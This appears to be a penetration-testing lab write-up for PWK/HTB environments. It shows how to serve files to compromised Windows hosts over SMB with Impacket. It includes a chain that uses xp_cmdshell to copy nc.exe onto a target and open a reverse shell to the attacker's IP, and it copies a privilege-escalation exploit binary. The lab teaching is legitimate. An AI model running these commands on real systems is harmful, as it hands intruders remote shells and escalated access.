Moving files to and from a compromised Linux machine is, in general, pretty easy. You’ve got nc, wget, curl, and if you get really desperate, base64 copy and paste. Windows, is another issue all together. PowerShell makes this somewhat easier, but for a lot of the PWK labs, the systems are too old to have PowerShell. The course material goes over a few ways to achieve this, but they don’t cover my favorite - SMB. This may be less realistic in an environment where you have to connect from a victim machine back to your attacker box over the public internet (where SMB could be blocked), but for environments like PWK labs and HTB where you are vpned into the same LAN as your targets, it works great.

Overview

The goal here is to get easy file transfer to and from a compromised Windows host. To do this, we’ll create an SMB share on our local box, and then connect to that share from the compromised Windows host. From there, we can copy files into the shared folder on either host, and then access them on the other host.

Server

Installation

The Impacket tool set comes pre-installed on Kali. If you don’t have it for some reason, you can install it with apt install python-impacket. You can also clone the Secure Auth Corp Impacket git repo if you want the most up to date version.

Starting the Server

To get the server up and running on our local box, simple enter the following syntax:

# impacket-smbserver.py shareName sharePath
  • shareName - can be anything you want, but you’ll need to know this in order to connect back to the share
  • sharePath - the folder you want shared

Example

For example, I keep a tools directory with a bunch of common stuff I might need as I work though my labs:

root@kali:~/pwk# ls tools/
25912.exe              cachedump.exe  lonelypotato.exe  ms11-046.exe  MS14-002.exe      MS14-070.exe  nc.exe     PwDump.exe        wce32.exe   windows-privesc-check2.exe
37049-32.exe           ff.exe         mimikatz          MS11-046.exe  MS14-070          MS14-070.rar  plink.exe  rottenpotato.exe  wce64.exe   winx86_meterpreter_80.exe
accesschk-2003-xp.exe  fgdump.exe     mimikatz.exe      MS13-053.exe  MS14-070_adduser  nc64.exe      Privesc    sysinternals      whoami.exe  winx86_stageless_shell_80.exe

Others like to create an smb directory for each target and drop the necessary files into it.

Then I can share this directory as follows:

root@kali:~/pwk# impacket-smbserver smb tools/
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Client

Syntax

From the Windows host, we need to use the build in net use command to connect to our shared drive. Here’s three examples of the syntax:

C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]

The first command will list all currently connected shares. The second will create a connection to the named shared at the given host (in our case, typically an IP address). The third command will close that connection.

Once that runs, you can reference the share by it’s full UNC path.

Examples

With Shell

Let’s say we wanted to copy a privesc binary to the host. We could do the following.

Connect to the share:

C:\>net use \\10.11.0.XXX\smb
net use \\10.11.0.XXX\smb
The command completed successfully.

Copy the file:

C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
        1 file(s) copied.

To Get Shell From RCE

In a different case, I only had access to a MySQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:

1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
        output
        ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        The command completed successfully.
        NULL
        NULL
(return status = 0)

1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
        output
        ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                1 file(s) copied.
                NULL
(return status = 0)

1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go

Opsec Notes

Locally

When you run this server, you’ve created an unauthenticated share on the network that anyone can read and write to. That’s why it’s important not to share anything sensitive (like your notes directory), as someone could mess with or delete them.

It’s also a good idea to take down the share when you’re not using it.

You will be able to tell when a new host connects to your share, and when they disconnect:

[*] Incoming connection (10.11.1.X,3187)
[*] AUTHENTICATE_MESSAGE (\,USERNAME)
[*] User \USERNAME authenticated successfully
[*] :::00::4141414141414141
[*] Closing down connection (10.11.1.5,3187)
[*] Remaining connections []

On Target

There is an option to net use to allow you to reference a connected share by a new drive letter. To do this, just run:

C:\>net use p: \\10.11.0.X\smb

From there, you can go to that drive and it’s easier to interact with. It’s also very unsafe opsec. A user on the box is unlikely to see a mapped share, but might very well notice a new drive letter. The same goes for others in the labs with you attacking the same box. It’s worth the extra trouble to just use the UNC path.